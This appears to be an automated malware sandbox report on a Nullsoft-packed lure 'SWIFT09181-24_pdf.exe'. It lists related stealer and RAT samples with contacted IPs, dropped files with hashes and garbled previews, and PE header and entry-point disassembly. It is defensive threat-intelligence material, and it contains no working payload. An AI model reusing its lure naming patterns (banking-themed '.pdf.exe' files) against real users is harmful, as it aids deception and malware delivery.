                                                                                                              hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              TELEGRAMRUfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                              • 149.154.167.99
                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                              • 149.154.167.99
                                                                                                              RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                              • 149.154.167.99
                                                                                                              3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.99
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.99
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 104.21.51.88
                                                                                                              zapret.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 162.159.136.232
                                                                                                              https://fsharetv.ioGet hashmaliciousUnknownBrowse
                                                                                                              • 104.17.167.186
                                                                                                              https://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                                                                              • 104.17.25.14
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 104.21.79.7
                                                                                                              Merge.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                              • 104.26.1.231
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 172.67.207.38
                                                                                                              wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.179.207
                                                                                                              AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.207.38
                                                                                                              I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.207.38
                                                                                                              ORACLE-BMC-31898USfile.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              elitebotnet.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 140.204.52.53
                                                                                                              77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 158.101.44.242
                                                                                                              AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 193.122.130.0
                                                                                                              Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 192.29.14.118
                                                                                                              Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 193.122.6.168
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 158.101.44.242
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adTvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Tvl72VM6PM.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                              • 104.21.67.152
                                                                                                              CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eTD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              LaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                              • 149.154.167.220
                                                                                                              RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                              • 149.154.167.220
                                                                                                              FEDEX234598765.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                              • 149.154.167.220
                                                                                                              3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                              • 149.154.167.220
                                                                                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              build.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              C:\Users\user\AppData\Local\Temp\nsw967F.tmp\System.dllO0rhQM49FL.exeGet hashmaliciousUnknownBrowse
                                                                                                                O0rhQM49FL.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        K8ZvbdkrGx.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  Process:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):134264
                                                                                                                                  Entropy (8bit):4.605669963186572
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:xj4mzkFU365SZQUQ9jA+gJqtUqouOlaHaoYCD9gDrh:xj4skFWkeQ6+Laqiw6eDaDrh
                                                                                                                                  MD5:F166237825F14B277F465F26CABC12EF
                                                                                                                                  SHA1:1DE8BA3AC6D167148A6965BC03B74E363A3E628E
                                                                                                                                  SHA-256:981A5F9CB1CC649C30241B04A6D51EDC30CEBA85D1396C02F0D210E58D3B68F1
                                                                                                                                  SHA-512:B8695964D1A245FF7C64E43EDCCA958D5B9391AEEFBF02F1C19050772252FE5E8A1BF70D6FFE71DA759155B90DB3128DE419B28A9F6F7308605B1A5245490700
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:.........p................`.:...........D............................].66.....................%.....--............................~~..XX..........."......~....jjj.......................'''.........................L........#.........j............t..3333...|...................I....]........CC..:........w.........4.........KK..O...K....................www. .0..../////.....s.........HH...............II.q..k.b.||..........................\\...........F......P..................=====.....................:.""".........VVVVVVVVVV.....t..____......................................f.........N.....;...~..h..........................................................4.~~......?............Y....................................[..qqq...p.......nnn......QQ.....y...zzzzzzz.............:::.....??.RRR.....dd...a..|||...........$$...................................))))...DDDD.u.......................2.........|.{{..ZZZZZZ..........7......###.uuuuu.A.....**...LLLLLL.1..........W..mmmmm.........gg.:::........Z.
                                                                                                                                  Process:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):56641
                                                                                                                                  Entropy (8bit):1.2318917163845036
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                                                  MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                                                  SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                                                  SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                                                  SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                                                  Process:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):273959
                                                                                                                                  Entropy (8bit):7.775011891990138
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:F7bhGVhVT8F4bX35S7KMDGWqbfeaFuYjSd0q09YdGm+DLvpBCUe:F79GdbXFPWqrebJcKQBhe
                                                                                                                                  MD5:93545E50541335CD9B1457812BE4637C
                                                                                                                                  SHA1:E7A88BEFAD0828C4E17E37756CEC3039D4B8515B
                                                                                                                                  SHA-256:8C50FA361425AEB62B60DBB05718B144E9BF9CF95D5DBEE541BA39D4FE9068AA
                                                                                                                                  SHA-512:330F84040AA98487DF2165879D819827490839937C91CF90EAB767B71C1A22D58F6513236AE156B18AB8AD39B413D1CF93F35521568D2A903F7D9A2A5435E95F
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:............D........1111...Z....g.....>...............kkk..6..............CC..........dd.....&...................s...............***........J......................................kk...i.............................`````.5....................-...qqq..A.........E............................`.........b......o.rrrr..........F......x..............tt............................]]]]]..444...=..........................................FFFFF.......(........................T......................................O.000.#.}.............8..>......X...........R....[................jj......<<..u..VVVVVV.......u..........................k.FFF..........`.......|............................................................/.................ddd.....3........ttt....((......................._..yy.....................3.q....qq.T.a..........===.............].......BB................WWWW......t...........I...77..TT..LL......nn.....................+++.}}..Y...w.AA...............DDD.................sssss.<<.."...
                                                                                                                                  Process:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):345
                                                                                                                                  Entropy (8bit):4.241929841155785
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                                                  MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                                                  SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                                                  SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                                                  SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                                                  Process:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):210366
                                                                                                                                  Entropy (8bit):1.240975322465592
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                                                  MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                                                  SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                                                  SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                                                  SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                                                  Process:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):363811
                                                                                                                                  Entropy (8bit):1.2512349423386382
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                                                  MD5:BFEA15C03AB295424981A73637A19491
                                                                                                                                  SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                                                  SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                                                  SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                                                  Process:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):11776
                                                                                                                                  Entropy (8bit):5.655335921632966
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                                                  MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                                                  SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                                                  SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                                                  SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: 5WP9WCM8qV.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: JOSXXL1.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Certificado FNMT-RCM.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: Produccion.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe, Detection: malicious, Browse
                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1156
                                                                                                                                  Entropy (8bit):3.250976511083343
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:8wl0asXowAOcQ/tz0/CSL6/cBnwgXl341DEDeG41DED/RKQ1olfW+kjcmAahTCN7:8xLDWLrFPjPL9izZMspdqy
                                                                                                                                  MD5:DA3120C581FD7369156BF3B9B82815B5
                                                                                                                                  SHA1:12B60059AE6BCFFFADEB2D4BDD2B4000E5295362
                                                                                                                                  SHA-256:5EA5E2BC538A59AA6F16F46991007F577B6EA4B456D42CBBDCF25EAB84FFA971
                                                                                                                                  SHA-512:B65020A6B78960BED204A4F4C39BEE4BD43E28349DB8D61C91788D6600E89204DFFB4D9087434D8A924994C04C8C36F2A3D69563FDA8AE1D34A333F017AC2FD6
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.O.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.............y.............>.e.L.:..er.=y....
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):7.964353590785383
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:SWIFT09181-24_pdf.exe
                                                                                                                                  File size:484'309 bytes
                                                                                                                                  MD5:e47d302ad20a15e7c4816b5e7b236699
                                                                                                                                  SHA1:784795652df30bc7919b8fd74df3056df586c4e8
                                                                                                                                  SHA256:7683dbf87b229a5c18546c930ccf2625f3cf8443a8deddd5c18446fd953e3cd4
                                                                                                                                  SHA512:dfccf948fc36fdb83adbe56cc8010c7aa17d2e56c5854003c395cb498469429fea4bf65a42505a013f9fc45fe33bc0754ab0e0f5f0801e912466a9217f7a0471
                                                                                                                                  SSDEEP:12288:I5AjfSA+NkoaVfXmCgWl7j+Hu7Jj1JK8s5FEeKM:ZOioa5XmCJdjIu7Jj1Jiceh
                                                                                                                                  TLSH:F3A4234142B8C947F972873C6E37BFBB7A7E231652605F06A3500E667C70A528CAF85D
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                                                  Icon Hash:3d2e0f95332b3399
                                                                                                                                  Entrypoint:0x4032a0
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                                                  Instruction
                                                                                                                                  sub esp, 000002D4h
                                                                                                                                  push ebp
                                                                                                                                  push esi
                                                                                                                                  push 00000020h
                                                                                                                                  xor ebp, ebp
                                                                                                                                  pop esi
                                                                                                                                  mov dword ptr [esp+0Ch], ebp
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [esp+0Ch], 0040A300h
                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                  call dword ptr [004080B0h]
                                                                                                                                  call dword ptr [004080ACh]
                                                                                                                                  cmp ax, 00000006h
                                                                                                                                  je 00007FE094BCDCA3h
                                                                                                                                  push ebp
                                                                                                                                  call 00007FE094BD0DE6h
                                                                                                                                  cmp eax, ebp
                                                                                                                                  je 00007FE094BCDC99h
                                                                                                                                  push 00000C00h
                                                                                                                                  call eax
                                                                                                                                  push ebx
                                                                                                                                  push edi
                                                                                                                                  push 0040A2F4h
                                                                                                                                  call 00007FE094BD0D63h
                                                                                                                                  push 0040A2ECh
                                                                                                                                  call 00007FE094BD0D59h
                                                                                                                                  push 0040A2E0h
                                                                                                                                  call 00007FE094BD0D4Fh
                                                                                                                                  push 00000009h
                                                                                                                                  call 00007FE094BD0DB4h
                                                                                                                                  push 00000007h
                                                                                                                                  call 00007FE094BD0DADh
                                                                                                                                  mov dword ptr [00434F04h], eax
                                                                                                                                  call dword ptr [00408044h]
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [004082A8h]
                                                                                                                                  mov dword ptr [00434FB8h], eax
                                                                                                                                  push ebp
                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                  push 000002B4h
                                                                                                                                  push eax
                                                                                                                                  push ebp
                                                                                                                                  push 0042B228h
                                                                                                                                  call dword ptr [0040818Ch]
                                                                                                                                  push 0040A2C8h
                                                                                                                                  push 00433F00h
                                                                                                                                  call 00007FE094BD099Ah
                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                  mov ebx, 0043F000h
                                                                                                                                  push eax
                                                                                                                                  push ebx
                                                                                                                                  call 00007FE094BD0988h
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [00408178h]
                                                                                                                                  Programming Language:
                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
